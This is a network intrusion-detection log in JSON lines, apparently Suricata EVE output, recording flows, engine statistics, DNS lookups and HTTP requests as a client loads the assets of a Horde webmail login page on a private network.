{"timestamp":"2020-02-29T00:24:26.000704+0000","flow_id":96399181527716,"event_type":"flow","src_ip":"192.168.10.81","src_port":52980,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1299,"bytes_toclient":1110,"start":"2020-02-29T00:23:20.440996+0000","end":"2020-02-29T00:23:25.669829+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:24:27.000194+0000","event_type":"stats","stats":{"uptime":15119,"capture":{"kernel_packets":140276,"kernel_drops":0},"decoder":{"pkts":140360,"bytes":96376290,"invalid":195,"ipv4":138781,"ipv6":10,"ethernet":140360,"raw":0,"null":0,"sll":0,"tcp":133227,"udp":5344,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7089280},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2883,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2899,"synack":2890,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1898,"ftp":0,"smtp":0,"tls":779,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2445,"failed_udp":116},"tx":{"http":4911,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2527}},"flow_mgr":{"closed_pruned":2868,"new_pruned":17,"est_pruned":2518,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":0,"flows_timeout":2,"flows_timeout_inuse":2,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":13875,"memcap_state":0,"memcap_global":0},"http":{"memuse":80,"memcap":0}}} {"timestamp":"2020-02-29T00:24:34.002570+0000","event_type":"stats","stats":{"uptime":15126,"capture":{"kernel_packets":140362,"kernel_drops":0},"decoder":{"pkts":140368,"bytes":96376832,"invalid":195,"ipv4":138787,"ipv6":10,"ethernet":140368,"raw":0,"null":0,"sll":0,"tcp":133233,"udp":5344,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7088992},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2883,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2899,"synack":2890,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1898,"ftp":0,"smtp":0,"tls":779,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2445,"failed_udp":116},"tx":{"http":4911,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2527}},"flow_mgr":{"closed_pruned":2869,"new_pruned":17,"est_pruned":2518,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":0,"flows_timeout":2,"flows_timeout_inuse":2,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":13875,"memcap_state":0,"memcap_global":0},"http":{"memuse":80,"memcap":0}}} {"timestamp":"2020-02-29T00:24:42.000226+0000","event_type":"stats","stats":{"uptime":15134,"capture":{"kernel_packets":140362,"kernel_drops":0},"decoder":{"pkts":140368,"bytes":96376832,"invalid":195,"ipv4":138787,"ipv6":10,"ethernet":140368,"raw":0,"null":0,"sll":0,"tcp":133233,"udp":5344,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7088992},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2883,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2899,"synack":2890,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1898,"ftp":0,"smtp":0,"tls":779,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2445,"failed_udp":116},"tx":{"http":4911,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2527}},"flow_mgr":{"closed_pruned":2869,"new_pruned":17,"est_pruned":2518,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":0,"flows_timeout":2,"flows_timeout_inuse":2,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":13875,"memcap_state":0,"memcap_global":0},"http":{"memuse":80,"memcap":0}}} {"timestamp":"2020-02-29T00:24:47.000550+0000","flow_id":206771237029553,"event_type":"flow","src_ip":"192.168.10.122","src_port":39566,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:46.460465+0000","end":"2020-02-29T00:19:46.569640+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:47.000963+0000","flow_id":2245338809397529,"event_type":"flow","src_ip":"192.168.10.122","src_port":51086,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":2,"pkts_toclient":2,"bytes_toserver":172,"bytes_toclient":282,"start":"2020-02-29T00:19:46.684313+0000","end":"2020-02-29T00:19:46.910017+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:48.001081+0000","flow_id":302055086514181,"event_type":"flow","src_ip":"192.168.10.122","src_port":54089,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":2,"pkts_toclient":2,"bytes_toserver":172,"bytes_toclient":282,"start":"2020-02-29T00:19:46.942085+0000","end":"2020-02-29T00:19:47.309545+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:48.328496+0000","flow_id":404301097748814,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53108,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2067}} {"timestamp":"2020-02-29T00:24:48.420446+0000","flow_id":404301097748814,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53108,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2067},"app_proto":"http","fileinfo":{"filename":"\/login.php","state":"CLOSED","stored":false,"size":5873,"tx_id":0}} {"timestamp":"2020-02-29T00:24:48.424060+0000","flow_id":2058924363639521,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53110,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/mozilla.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":141}} {"timestamp":"2020-02-29T00:24:48.425400+0000","flow_id":2058924363639521,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53110,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/mozilla.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":141},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/mozilla.css","state":"CLOSED","stored":false,"size":173,"tx_id":0}} {"timestamp":"2020-02-29T00:24:48.428962+0000","flow_id":2226118850538449,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53114,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/horde.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2236}} {"timestamp":"2020-02-29T00:24:48.430576+0000","flow_id":2058924363639521,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53110,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/accesskeys.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1005}} {"timestamp":"2020-02-29T00:24:48.432132+0000","flow_id":1027445017833512,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53118,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/login.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":280}} {"timestamp":"2020-02-29T00:24:48.432491+0000","flow_id":2058924363639521,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53110,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/accesskeys.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1005},"app_proto":"http","fileinfo":{"filename":"\/js\/accesskeys.js","state":"CLOSED","stored":false,"size":2729,"tx_id":1}} {"timestamp":"2020-02-29T00:24:48.432746+0000","flow_id":2058924363639521,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53110,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/horde-power1.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2258}} {"timestamp":"2020-02-29T00:24:48.429717+0000","flow_id":404301097748814,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53108,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":9246}} {"timestamp":"2020-02-29T00:24:48.430661+0000","flow_id":1391374776691898,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53116,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/login.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1118}} {"timestamp":"2020-02-29T00:24:48.448591+0000","flow_id":25411967806218,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53112,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/prototype.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":31816},"app_proto":"http","fileinfo":{"filename":"\/js\/prototype.js","state":"TRUNCATED","stored":false,"size":106496,"tx_id":0}} {"timestamp":"2020-02-29T00:24:48.450066+0000","flow_id":25411967806218,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53112,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/prototype.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":46054}} {"timestamp":"2020-02-29T00:24:48.513328+0000","flow_id":25411967806218,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53112,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-default.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87}} {"timestamp":"2020-02-29T00:24:48.575865+0000","flow_id":25411967806218,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53112,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-default.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-default.png","state":"CLOSED","stored":false,"size":87,"tx_id":1}} {"timestamp":"2020-02-29T00:24:48.576235+0000","flow_id":25411967806218,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53112,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":918}} {"timestamp":"2020-02-29T00:24:49.000298+0000","event_type":"stats","stats":{"uptime":15141,"capture":{"kernel_packets":140362,"kernel_drops":0},"decoder":{"pkts":140368,"bytes":96376832,"invalid":195,"ipv4":138787,"ipv6":10,"ethernet":140368,"raw":0,"null":0,"sll":0,"tcp":133233,"udp":5344,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10002,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7088416},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2883,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2899,"synack":2890,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1898,"ftp":0,"smtp":0,"tls":779,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2445,"failed_udp":116},"tx":{"http":4911,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2527}},"flow_mgr":{"closed_pruned":2869,"new_pruned":17,"est_pruned":2520,"bypassed_pruned":0,"flows_checked":5,"flows_notimeout":1,"flows_timeout":4,"flows_timeout_inuse":2,"flows_removed":2,"rows_checked":65536,"rows_skipped":65531,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":12884,"memcap_state":0,"memcap_global":0},"http":{"memuse":259172,"memcap":0}}} {"timestamp":"2020-02-29T00:24:49.001045+0000","flow_id":2154259743701700,"event_type":"flow","src_ip":"192.168.10.130","src_port":34274,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":39,"pkts_toclient":66,"bytes_toserver":5625,"bytes_toclient":81171,"start":"2020-02-29T00:22:30.916164+0000","end":"2020-02-29T00:22:36.258283+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:24:49.001535+0000","flow_id":1798765300213308,"event_type":"flow","src_ip":"192.168.10.130","src_port":34272,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":37,"pkts_toclient":73,"bytes_toserver":4670,"bytes_toclient":95925,"start":"2020-02-29T00:22:24.976444+0000","end":"2020-02-29T00:22:30.123349+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:24:50.000647+0000","flow_id":1638833592828724,"event_type":"flow","src_ip":"192.168.10.122","src_port":48417,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:49.688948+0000","end":"2020-02-29T00:19:49.800136+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:51.000340+0000","flow_id":1012257993948441,"event_type":"flow","src_ip":"192.168.10.122","src_port":39263,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:50.490777+0000","end":"2020-02-29T00:19:50.601928+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:51.001295+0000","flow_id":545992049333857,"event_type":"flow","src_ip":"192.168.10.122","src_port":59343,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:50.628321+0000","end":"2020-02-29T00:19:50.736476+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:51.001598+0000","flow_id":559357987575908,"event_type":"flow","src_ip":"192.168.10.122","src_port":54554,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:50.252004+0000","end":"2020-02-29T00:19:50.360299+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:53.433983+0000","flow_id":2226118850538449,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53114,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/horde.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2236},"app_proto":"http","fileinfo":{"filename":"\/js\/horde.js","state":"CLOSED","stored":false,"size":6422,"tx_id":0}} {"timestamp":"2020-02-29T00:24:53.434123+0000","flow_id":1027445017833512,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53118,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/login.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":280},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/login.js","state":"CLOSED","stored":false,"size":415,"tx_id":0}} {"timestamp":"2020-02-29T00:24:53.434165+0000","flow_id":2058924363639521,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53110,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/horde-power1.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2258},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/horde-power1.png","state":"CLOSED","stored":false,"size":2258,"tx_id":2}} {"timestamp":"2020-02-29T00:24:53.434077+0000","flow_id":1391374776691898,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53116,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/login.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1118},"app_proto":"http","fileinfo":{"filename":"\/js\/login.js","state":"CLOSED","stored":false,"size":3062,"tx_id":0}} {"timestamp":"2020-02-29T00:24:53.434898+0000","flow_id":404301097748814,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53108,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":9246},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":48239,"tx_id":1}} {"timestamp":"2020-02-29T00:24:53.581143+0000","flow_id":25411967806218,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53112,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":918},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":918,"tx_id":2}} {"timestamp":"2020-02-29T00:24:54.000497+0000","flow_id":1486409513894428,"event_type":"flow","src_ip":"192.168.10.130","src_port":34280,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":32,"pkts_toclient":64,"bytes_toserver":3501,"bytes_toclient":80837,"start":"2020-02-29T00:23:45.393756+0000","end":"2020-02-29T00:23:50.437750+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:24:54.000728+0000","flow_id":231209601455855,"event_type":"flow","src_ip":"192.168.10.122","src_port":33684,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:53.120559+0000","end":"2020-02-29T00:19:53.229605+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:55.000492+0000","flow_id":2148994103536245,"event_type":"flow","src_ip":"192.168.10.122","src_port":50516,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:19:54.289397+0000","end":"2020-02-29T00:19:54.400745+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 